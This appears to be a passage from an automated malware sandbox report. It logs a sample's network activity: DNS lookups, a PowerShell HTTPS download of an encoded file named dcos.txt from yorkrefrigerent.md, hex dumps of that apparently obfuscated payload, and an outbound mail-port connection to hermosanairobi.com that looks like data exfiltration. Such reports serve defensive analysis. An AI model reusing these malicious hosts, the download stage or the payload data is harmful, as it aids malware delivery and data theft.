                      Mar 20, 2023 11:39:15.172951937 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.173042059 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.173046112 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.173074007 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.173135042 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.222126007 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.222212076 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.222323895 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.222356081 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.222393990 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.222448111 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.222497940 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.222543955 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.222553015 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.222630978 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.222678900 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.222678900 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.223565102 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.223628998 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.223669052 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.223685980 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.223752975 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.224080086 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.224138975 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.224163055 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.224175930 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.224214077 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.224445105 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.224488974 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.224524975 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.224536896 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.224579096 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.224673986 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.224736929 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.224749088 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.224760056 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.224811077 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.273453951 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.273549080 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.273765087 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.273803949 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.274024963 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.274121046 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.274122953 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.274143934 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.274188042 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.274281025 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.274647951 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.274734020 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.274867058 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.274884939 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.274919987 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.274955034 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.274993896 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.276947021 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:21.187418938 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:39:21.299160004 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:39:21.299515009 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:39:21.564197063 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:39:21.565077066 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:39:21.676940918 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:39:21.679080963 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:39:21.790937901 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:39:21.791357040 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:39:21.926242113 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:39:21.930711985 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:39:22.042381048 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:39:22.047056913 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:39:22.159348965 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:39:22.162383080 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:39:22.274471045 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:39:22.274501085 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:39:22.276468992 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:39:22.276555061 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:39:22.276598930 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:39:22.276634932 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:39:22.388118982 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:39:22.388180971 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:39:22.389344931 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:39:22.473431110 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:41:00.929255962 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:41:01.080133915 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:41:01.241976976 CET2649696192.81.170.3192.168.2.5
                      Mar 20, 2023 11:41:01.242150068 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:41:01.263398886 CET4969626192.168.2.5192.81.170.3
                      Mar 20, 2023 11:41:01.375224113 CET2649696192.81.170.3192.168.2.5

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Mar 20, 2023 11:39:14.710347891 CET5864853192.168.2.58.8.8.8
                      Mar 20, 2023 11:39:14.775989056 CET53586488.8.8.8192.168.2.5
                      Mar 20, 2023 11:39:20.891591072 CET5689453192.168.2.58.8.8.8
                      Mar 20, 2023 11:39:21.012171984 CET53568948.8.8.8192.168.2.5
                      Mar 20, 2023 11:39:21.057976961 CET5029553192.168.2.58.8.8.8
                      Mar 20, 2023 11:39:21.176559925 CET53502958.8.8.8192.168.2.5

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Mar 20, 2023 11:39:14.710347891 CET192.168.2.58.8.8.80x4169Standard query (0)yorkrefrigerent.mdA (IP address)IN (0x0001)false
                      Mar 20, 2023 11:39:20.891591072 CET192.168.2.58.8.8.80x48c3Standard query (0)mail.hermosanairobi.comA (IP address)IN (0x0001)false
                      Mar 20, 2023 11:39:21.057976961 CET192.168.2.58.8.8.80x8071Standard query (0)mail.hermosanairobi.comA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Mar 20, 2023 11:39:14.775989056 CET8.8.8.8192.168.2.50x4169No error (0)yorkrefrigerent.md195.178.106.125A (IP address)IN (0x0001)false
                      Mar 20, 2023 11:39:21.012171984 CET8.8.8.8192.168.2.50x48c3No error (0)mail.hermosanairobi.comhermosanairobi.comCNAME (Canonical name)IN (0x0001)false
                      Mar 20, 2023 11:39:21.012171984 CET8.8.8.8192.168.2.50x48c3No error (0)hermosanairobi.com192.81.170.3A (IP address)IN (0x0001)false
                      Mar 20, 2023 11:39:21.176559925 CET8.8.8.8192.168.2.50x8071No error (0)mail.hermosanairobi.comhermosanairobi.comCNAME (Canonical name)IN (0x0001)false
                      Mar 20, 2023 11:39:21.176559925 CET8.8.8.8192.168.2.50x8071No error (0)hermosanairobi.com192.81.170.3A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • yorkrefrigerent.md

                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.549695195.178.106.125443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      TimestampkBytes transferredDirectionData
                      2023-03-20 10:39:14 UTC0OUTGET /public/storage_old/users/.vbb/dcos.txt HTTP/1.1
                      Host: yorkrefrigerent.md
                      Connection: Keep-Alive
                      2023-03-20 10:39:15 UTC0INHTTP/1.1 200 OK
                      Connection: close
                      content-type: text/plain
                      last-modified: Mon, 20 Mar 2023 05:56:22 GMT
                      accept-ranges: bytes
                      content-length: 224600
                      date: Mon, 20 Mar 2023 10:39:15 GMT
                      server: LiteSpeed
                      2023-03-20 10:39:15 UTC0INData Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                      Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                      2023-03-20 10:39:15 UTC16INData Raw: 31 39 57 5a 74 6c 47 56 66 52 58 5a 7a 42 41 64 7a 39 47 53 35 4a 30 63 73 46 57 61 30 35 57 5a 6b 56 6d 63 44 6c 45 41 30 4e 33 62 49 39 46 64 6c 4e 48 41 30 4e 58 61 4d 39 47 56 41 51 33 63 70 78 55 5a 6b 39 6d 54 73 31 47 57 41 51 33 63 6c 56 58 63 6c 4a 6c 59 6c 64 46 63 30 52 48 53 41 51 33 63 68 4e 45 41 30 4a 33 62 54 42 41 64 79 39 47 55 66 52 58 5a 7a 42 41 64 79 56 6d 64 75 39 32 51 41 51 6e 63 68 52 33 55 74 6c 6d 63 55 42 41 64 77 6c 6e 63 6a 35 57 52 30 42 58 65 79 4e 6b 51 41 51 48 63 35 4a 33 59 6c 52 45 64 77 6c 6e 63 44 4a 45 41 30 35 57 64 76 4e 6b 62 76 6c 47 64 68 4a 58 5a 30 6c 30 58 30 56 32 63 41 51 6e 62 31 39 32 51 72 4e 57 61 55 39 46 64 6c 64 47 41 30 35 57 64 76 4e 30 58 30 56 32 5a 41 51 6e 62 70 39 47 55 41 51 6e 62 6c 4a 6e
                      Data Ascii: 19WZtlGVfRXZzBAdz9GS5J0csFWa05WZkVmcDlEA0N3bI9FdlNHA0NXaM9GVAQ3cpxUZk9mTs1GWAQ3clVXclJlYldFc0RHSAQ3chNEA0J3bTBAdy9GUfRXZzBAdyVmdu92QAQnchR3UtlmcUBAdwlncj5WR0BXeyNkQAQHc5J3YlREdwlncDJEA05WdvNkbvlGdhJXZ0l0X0V2cAQnb192QrNWaU9FdldGA05WdvN0X0V2ZAQnbp9GUAQnblJn
                      2023-03-20 10:39:15 UTC32INData Raw: 53 49 52 41 30 42 67 72 65 6f 57 41 30 42 67 4b 50 30 78 41 78 2b 42 6c 50 67 49 41 70 78 67 56 4e 59 4f 41 70 4a 67 4d 55 34 7a 41 78 57 67 34 46 6b 61 41 30 74 78 48 4a 49 4e 41 78 42 67 7a 51 4d 79 41 78 57 41 44 59 55 75 42 4a 35 52 37 59 55 2b 41 4a 36 52 33 4f 59 45 41 35 44 67 4b 4c 55 69 42 78 34 42 72 47 38 68 42 5a 49 67 39 65 4d 73 42 5a 34 52 70 61 41 74 42 5a 4d 77 39 61 63 76 42 5a 4d 77 39 52 45 6f 42 5a 55 41 44 65 67 76 42 5a 34 78 6e 59 55 75 42 68 41 67 4b 59 55 75 42 5a 34 68 6c 59 55 75 42 52 41 68 41 67 51 4f 41 52 56 41 44 68 63 67 42 42 55 67 34 46 6b 61 41 73 35 78 68 63 38 6f 42 42 55 41 44 49 6b 74 42 70 34 52 67 55 67 6c 42 52 34 78 64 59 55 75 42 52 55 41 44 4b 67 6e 42 4a 55 41 44 49 4d 73 42 4a 41 67 4b 59 55 75 42 4a 4d 77
                      Data Ascii: SIRA0BgreoWA0BgKP0xAx+BlPgIApxgVNYOApJgMU4zAxWg4FkaA0txHJINAxBgzQMyAxWADYUuBJ5R7YU+AJ6R3OYEA5DgKLUiBx4BrG8hBZIg9eMsBZ4RpaAtBZMw9acvBZMw9REoBZUADegvBZ4xnYUuBhAgKYUuBZ4hlYUuBRAhAgQOARVADhcgBBUg4FkaAs5xhc8oBBUADIktBp4RgUglBR4xdYUuBRUADKgnBJUADIMsBJAgKYUuBJMw
                      2023-03-20 10:39:15 UTC48INData Raw: 41 45 41 41 30 4a 67 67 41 59 4a 41 41 41 41 41 69 51 48 41 42 41 51 55 43 49 49 41 57 43 41 41 41 41 67 49 6f 41 51 41 41 41 69 41 58 43 51 6b 41 41 41 41 41 45 43 39 41 45 41 41 67 51 67 30 41 45 4a 41 41 41 41 41 68 41 4d 41 42 41 41 49 43 49 49 41 57 43 41 41 41 41 41 49 77 43 51 41 41 6f 43 47 6c 6a 68 68 41 41 41 41 41 41 53 70 41 45 41 41 67 49 67 67 41 59 4a 41 41 41 41 41 67 41 31 49 63 4d 41 6b 42 45 78 49 58 41 78 6e 42 4d 78 46 36 4e 67 66 42 4d 42 41 7a 2f 77 37 42 4d 42 41 7a 50 41 62 42 4d 78 46 36 39 67 32 42 4d 78 49 53 4d 77 56 42 4d 78 49 4e 38 67 73 42 4d 78 49 49 4d 67 51 42 4d 78 49 44 38 51 42 42 4d 78 49 44 4d 77 49 42 4d 78 46 36 35 67 43 42 4d 78 49 44 4d 67 44 42 4d 68 49 35 33 51 39 42 4d 68 49 2b 4c 51 2b 42 4d 68 49 35 62 51
                      Data Ascii: AEAA0JggAYJAAAAAiQHABAQUCIIAWCAAAAgIoAQAAAiAXCQkAAAAAEC9AEAAgQg0AEJAAAAAhAMABAAICIIAWCAAAAAIwCQAAoCGljhhAAAAAASpAEAAgIggAYJAAAAAgA1IcMAkBExIXAxnBMxF6NgfBMBAz/w7BMBAzPAbBMxF69g2BMxISMwVBMxIN8gsBMxIIMgQBMxID8QBBMxIDMwIBMxF65gCBMxIDMgDBMhI53Q9BMhI+LQ+BMhI5bQ
                      2023-03-20 10:39:15 UTC64INData Raw: 43 69 4a 69 45 6d 35 6a 62 2b 5a 69 67 31 6d 41 72 44 41 41 41 6f 51 4d 38 59 69 4e 36 63 53 4d 32 51 7a 4f 30 63 43 4c 32 6b 7a 46 56 42 41 41 41 30 77 4e 61 41 41 45 63 45 77 46 73 55 74 68 7a 42 41 41 41 63 67 2f 31 4c 2f 7a 39 69 38 7a 6b 37 72 7a 6f 76 36 70 75 2f 78 46 63 4f 4a 41 41 41 67 44 2f 6a 2f 30 4a 6d 2f 33 57 43 5a 32 34 72 34 2f 34 50 64 69 35 2f 74 6b 5a 6a 76 69 2f 6a 2f 30 4a 6d 2f 33 57 4f 5a 32 70 68 48 68 6b 43 41 41 41 34 68 46 37 45 53 4d 39 41 69 4e 79 5a 51 50 35 63 44 50 6b 4a 4c 7a 53 42 41 41 41 30 41 72 68 75 37 71 6e 71 4c 72 6d 76 36 70 6c 47 32 4b 31 6a 4d 41 41 41 77 43 55 6b 7a 49 7a 38 6a 49 30 41 45 42 73 43 46 41 41 41 77 42 43 6c 47 5a 58 5a 47 64 30 42 48 61 31 4e 6d 52 73 79 38 42 41 41 41 41 4c 6b 31 66 70 35 6e
                      Data Ascii: CiJiEm5jb+Zig1mArDAAAoQM8YiN6cSM2QzO0cCL2kzFVBAAA0wNaAAEcEwFsUthzBAAAcg/1L/z9i8zk7rzov6pu/xFcOJAAAgD/j/0Jm/3WCZ24r4/4Pdi5/tkZjvi/j/0Jm/3WOZ2phHhkCAAA4hF7ESM9AiNyZQP5cDPkJLzSBAAA0Arhu7qnqLrmv6plG2K1jMAAAwCUkzIz8jI0AEBsCFAAAwBClGZXZGd0BHa1NmRsy8BAAAALk1fp5n
                      2023-03-20 10:39:15 UTC80INData Raw: 31 56 58 64 31 56 58 64 31 56 48 4d 58 62 57 56 41 41 41 41 65 6b 37 72 70 2b 4c 75 6a 36 37 73 4b 4b 36 72 34 65 61 70 35 75 4b 70 72 4f 4b 75 6c 69 36 6f 6b 6e 61 70 6e 69 43 4d 62 71 4d 41 41 41 77 47 59 53 4a 6e 5a 75 64 6e 51 65 49 6d 61 61 49 6c 62 53 4a 6e 48 71 35 6c 63 75 74 6c 61 69 5a 50 72 7a 54 39 41 41 41 41 58 4d 47 5a 70 5a 48 59 43 67 4c 66 46 41 41 41 41 55 67 6b 57 71 78 43 79 44 4b 41 41 41 67 41 50 68 55 52 61 78 55 43 45 7a 63 4b 41 41 41 41 46 34 4d 48 50 36 39 2f 41 41 41 41 42 45 32 59 71 6b 66 5a 54 42 41 41 41 49 67 30 51 76 32 67 31 44 4f 41 41 41 67 41 76 6a 65 35 36 7a 2b 66 4d 34 58 69 41 41 41 41 46 49 59 68 49 65 5a 67 39 67 75 70 6b 44 41 41 41 55 51 56 53 39 46 51 57 39 31 55 66 4d 44 41 41 41 51 42 35 34 7a 4d 73 6f 54
                      Data Ascii: 1VXd1VXd1VHMXbWVAAAAek7rp+Luj67sKK6r4eap5uKprOKuli6oknapniCMbqMAAAwGYSJnZudnQeImaaIlbSJnHq5lcutlaiZPrzT9AAAAXMGZpZHYCgLfFAAAAUgkWqxCyDKAAAgAPhURaxUCEzcKAAAAF4MHP69/AAAABE2YqkfZTBAAAIg0Qv2g1DOAAAgAvje56z+fM4XiAAAAFIYhIeZg9gupkDAAAUQVS9FQW91UfMDAAAQB54zMsoT
                      2023-03-20 10:39:15 UTC96INData Raw: 78 73 6e 41 52 77 53 41 2b 76 52 43 41 30 41 47 4b 45 41 41 41 30 52 6a 59 6b 41 4c 42 34 2f 46 4a 41 51 44 61 59 69 43 41 45 41 49 76 68 68 46 47 51 41 41 42 45 7a 65 43 45 42 4c 42 34 66 47 4a 41 51 44 5a 59 69 43 41 49 51 4e 76 5a 68 62 59 70 78 48 44 51 41 41 42 45 7a 65 43 51 42 4c 42 34 50 47 4a 41 51 44 64 77 67 43 41 49 67 4c 6f 59 68 42 4b 77 53 41 2b 7a 52 43 41 30 77 47 4c 6f 41 41 43 34 43 4b 57 59 67 43 73 45 67 2f 61 6b 41 41 41 41 41 41 51 69 54 44 57 45 42 41 41 63 4c 41 41 41 41 71 41 51 41 4d 54 41 41 41 41 41 51 48 41 59 38 73 41 4d 42 41 43 45 41 41 41 45 51 43 41 73 4c 71 41 4d 42 41 41 41 41 41 41 41 67 44 41 41 58 53 41 63 43 41 43 41 41 41 6f 45 41 41 71 55 51 45 2f 2f 76 2f 63 69 54 42 72 49 41 4c 42 34 66 48 48 45 42 41 48 4d 78
                      Data Ascii: xsnARwSA+vRCA0AGKEAAA0RjYkALB4/FJAQDaYiCAEAIvhhFGQAABEzeCEBLB4fGJAQDZYiCAIQNvZhbYpxHDQAABEzeCQBLB4PGJAQDdwgCAIgLoYhBKwSA+zRCA0wGLoAAC4CKWYgCsEg/akAAAAAAQiTDWEBAAcLAAAAqAQAMTAAAAAQHAY8sAMBACEAAAEQCAsLqAMBAAAAAAAgDAAXSAcCACAAAoEAAqUQE//v/ciTBrIALB4fHHEBAHMx
                      2023-03-20 10:39:15 UTC112INData Raw: 56 6a 53 43 45 45 42 33 4b 41 41 41 59 38 6d 42 52 63 41 4c 47 45 42 44 65 54 77 45 4b 41 51 41 70 38 32 42 47 45 78 2f 2f 2f 2f 4f 34 55 77 4b 43 77 53 41 2b 37 52 43 52 41 51 43 54 63 42 41 45 77 53 41 2b 62 52 43 52 41 51 43 54 6b 78 43 4b 41 41 41 74 2b 6d 41 4b 41 41 41 70 6a 79 44 73 45 67 2f 59 6b 51 45 41 6b 77 45 62 30 51 41 41 41 51 48 4e 69 31 46 5a 64 42 57 59 6b 6d 6a 49 49 42 4c 42 34 76 47 4a 45 42 41 4a 4d 42 48 4b 41 51 41 7a 2b 6d 46 4a 67 77 43 73 45 67 2f 62 6b 51 45 41 6b 77 45 64 77 70 46 5a 68 52 61 4f 6d 51 43 4c 77 53 41 2b 7a 52 43 52 41 51 43 54 67 68 43 4b 41 41 41 7a 2b 47 43 52 30 70 43 41 45 67 73 2b 5a 42 43 52 67 77 45 42 41 41 41 67 30 34 46 4b 41 51 41 78 69 79 41 69 77 53 41 2b 66 52 43 52 41 51 43 54 34 68 42 54 6f 41
                      Data Ascii: VjSCEEB3KAAAY8mBRcALGEBDeTwEKAQAp82BGEx////O4UwKCwSA+7RCRAQCTcBAEwSA+bRCRAQCTkxCKAAAt+mAKAAApjyDsEg/YkQEAkwEb0QAAAQHNi1FZdBWYkmjIIBLB4vGJEBAJMBHKAQAz+mFJgwCsEg/bkQEAkwEdwpFZhRaOmQCLwSA+zRCRAQCTghCKAAAz+GCR0pCAEgs+ZBCRgwEBAAAg04FKAQAxiyAiwSA+fRCRAQCT4hBToA
                      2023-03-20 10:39:15 UTC128INData Raw: 52 6b 67 6f 4b 41 41 41 6d 2f 6d 42 52 59 68 6d 46 45 52 43 46 45 52 43 51 45 6a 46 47 45 68 42 54 6f 41 41 41 38 2f 62 47 41 67 41 6a 68 53 61 36 61 64 75 67 6f 5a 42 52 6b 67 6f 4b 41 41 41 6d 2f 57 57 58 6f 41 41 41 6f 78 62 61 57 51 45 4a 59 68 6d 46 45 52 43 46 45 52 43 5a 77 69 43 41 41 51 5a 76 5a 41 41 43 4d 47 4b 70 70 72 31 67 43 69 6d 46 45 52 43 69 71 41 41 42 45 35 62 42 41 41 41 67 30 6f 46 61 57 51 45 4a 55 51 45 4a 41 41 41 41 49 4b 4f 46 4d 68 46 45 4d 52 57 58 6b 6d 6a 4a 30 67 43 41 41 41 50 76 64 51 45 64 79 79 48 57 63 51 45 48 4d 52 41 41 41 41 49 4e 65 68 43 41 41 67 30 76 68 31 46 4b 41 41 41 2f 2f 6d 42 41 49 77 59 6f 6b 6d 75 57 76 4b 49 45 41 41 41 51 76 6e 41 41 41 67 56 50 61 41 42 41 41 77 78 37 4a 41 42 41 41 41 30 37 4a 41
                      Data Ascii: RkgoKAAAm/mBRYhmFERCFERCQEjFGEhBToAAA8/bGAgAjhSa6adugoZBRkgoKAAAm/WWXoAAAoxbaWQEJYhmFERCFERCZwiCAAQZvZAACMGKppr1gCimFERCiqAABE5bBAAAg0oFaWQEJUQEJAAAAIKOFMhFEMRWXkmjJ0gCAAAPvdQEdyyHWcQEHMRAAAAINehCAAg0vh1FKAAA//mBAIwYokmuWvKIEAAAQvnAAAgVPaABAAwx7JABAAA07JA
                      2023-03-20 10:39:15 UTC144INData Raw: 4c 67 43 43 4f 77 53 41 2b 33 68 46 52 41 67 46 54 6f 52 46 54 59 68 42 73 45 67 2f 5a 59 52 45 41 59 78 45 4b 38 42 41 41 49 67 31 35 6b 67 43 73 45 67 2f 4a 38 68 46 52 41 67 46 54 6b 42 46 54 49 67 42 73 45 67 2f 59 59 52 45 41 59 78 45 62 41 41 41 43 77 50 4f 49 77 53 41 2b 72 68 46 52 41 67 46 54 6b 77 48 4e 59 41 41 42 6b 47 4b 48 73 41 4c 42 34 76 48 57 45 42 41 57 4d 42 48 4c 6f 5a 46 52 51 52 45 4a 77 53 41 2b 76 68 46 52 41 41 41 41 41 51 76 34 59 78 45 57 45 42 41 41 38 47 41 41 4d 67 51 41 55 41 4d 62 41 67 4b 47 38 2f 2f 36 50 50 4f 46 73 69 41 73 45 67 2f 72 38 78 46 52 41 77 46 54 63 42 41 45 77 53 41 2b 62 78 46 52 41 77 46 54 67 68 43 4b 41 41 41 34 4e 58 43 73 45 67 2f 58 63 52 45 41 63 78 45 64 38 52 45 54 45 41 41 41 30 52 6a 41 41 41
                      Data Ascii: LgCCOwSA+3hFRAgFToRFTYhBsEg/ZYREAYxEK8BAAIg15kgCsEg/J8hFRAgFTkBFTIgBsEg/YYREAYxEbAAACwPOIwSA+rhFRAgFTkwHNYAABkGKHsALB4vHWEBAWMBHLoZFRQREJwSA+vhFRAAAAAQv4YxEWEBAA8GAAMgQAUAMbAgKG8//6PPOFsiAsEg/r8xFRAwFTcBAEwSA+bxFRAwFTghCKAAA4NXCsEg/XcREAcxEd8RETEAAA0RjAAA
                      2023-03-20 10:39:15 UTC160INData Raw: 54 45 52 6e 4e 38 68 46 54 45 78 45 54 45 41 41 41 41 53 6a 59 6f 41 41 41 6f 32 62 47 41 67 41 6a 68 69 6c 46 52 30 68 67 6f 51 45 4d 45 42 41 41 41 67 74 35 6f 41 41 41 63 32 62 4b 45 42 44 52 77 77 45 61 4b 52 45 52 45 42 41 41 41 51 30 34 49 78 45 57 45 78 45 4c 45 78 43 54 6f 41 41 41 4d 4d 4b 4b 41 51 41 32 38 6d 43 41 45 51 4e 76 6c 51 45 49 45 68 43 54 6f 41 41 41 6f 41 4b 47 41 67 41 6a 68 53 61 36 75 62 65 67 6f 41 41 42 73 7a 62 4b 41 51 41 31 38 57 43 52 67 51 45 41 41 51 41 63 6b 6a 43 41 41 77 43 6f 6f 41 41 42 59 7a 62 4b 41 51 41 31 38 57 43 52 67 51 45 41 41 51 41 36 67 54 43 54 59 68 43 41 45 51 4f 76 70 41 41 42 67 7a 63 47 41 67 41 6a 68 53 61 36 75 72 5a 67 6f 41 41 41 6f 41 4b 47 41 67 41 6a 68 53 61 36 71 4c 68 67 6f 41 41 41 4d 43
                      Data Ascii: TERnN8hFTExETEAAAASjYoAAAo2bGAgAjhilFR0hgoQEMEBAAAgt5oAAAc2bKEBDRwwEaKREREBAAAQ04IxEWExELExCToAAAMMKKAQA28mCAEQNvlQEIEhCToAAAoAKGAgAjhSa6ubegoAABszbKAQA18WCRgQEAAQAckjCAAwCooAABYzbKAQA18WCRgQEAAQA6gTCTYhCAEQOvpAABgzcGAgAjhSa6urZgoAAAoAKGAgAjhSa6qLhgoAAAMC
                      2023-03-20 10:39:15 UTC176INData Raw: 2b 62 78 44 52 41 77 44 54 6b 68 43 54 45 41 41 41 30 51 6a 62 73 41 4c 42 34 50 47 50 45 42 41 50 4d 78 45 66 51 77 45 61 36 51 45 4e 45 78 43 73 45 67 2f 53 38 78 44 52 41 77 44 54 77 78 48 4e 49 54 61 4f 32 51 45 4f 45 42 44 73 45 67 2f 62 38 78 44 52 41 77 44 54 30 68 6f 4b 41 41 41 4b 67 69 42 41 49 77 59 6f 6b 6d 75 49 36 44 49 4b 41 41 41 36 67 43 48 66 6b 68 43 52 30 42 4c 42 34 50 48 50 45 42 41 50 4d 68 48 69 71 41 41 41 6f 41 4b 47 41 67 41 6a 68 53 61 36 69 59 2f 67 6f 41 41 41 6f 44 4b 63 38 68 47 4b 45 52 48 73 45 67 2f 64 38 51 45 41 38 77 45 57 38 68 42 54 59 41 41 42 67 50 4b 57 59 41 41 43 4d 47 4b 70 70 62 69 6a 42 69 42 41 49 77 59 6f 6b 6d 75 49 4f 4a 49 45 45 68 49 73 45 67 2f 56 38 78 44 52 41 77 44 54 30 78 48 4d 4d 42 57 58 77 51
